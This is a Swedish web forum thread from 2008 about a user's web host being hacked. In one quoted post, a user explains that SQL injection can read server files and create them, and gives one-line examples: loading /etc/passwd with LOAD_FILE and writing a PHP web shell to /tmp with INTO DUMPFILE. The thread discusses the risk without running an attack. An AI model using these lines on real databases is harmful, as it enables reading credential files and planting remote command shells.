Mitt andra webbhotell hackat efter Proinet

tartareandesire · 2008-02-28, 15:30

Citat:

Ursprungligen postat av SimonP

Citat:

Ursprungligen postat av tartareandesire

SQL Injections kan endast påverka databasen (såvida man inte kommer åt annan information därigenom då).

Ifall det finns tillräckliga rättigheter på databasen kan man både läsa och skapa filer med SQL injektioner.
T.ex för att läsa en fil:
SELECT LOAD_FILE(/etc/passwd);
Skapa:
SELECT ?php system(_GET[cmd]); ? INTO DUMPFILE /tmp/shell.php;

Mjo, iofs, men jag tror väl de flesta webbhotell inte tillåter det på delade burkar?

clirre · 2008-02-28, 16:15

Vad bör man ha för rättigheter på kataloger och filer? Jag har aldrig ändrat grundinställningen på dem men blir lite osäker nu när de ändrats av hackermiffot och jag själv ändrat tillbaka.

allstars · 2008-02-28, 17:34

nej

Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)

Menu

Mitt andra webbhotell hackat efter Proinet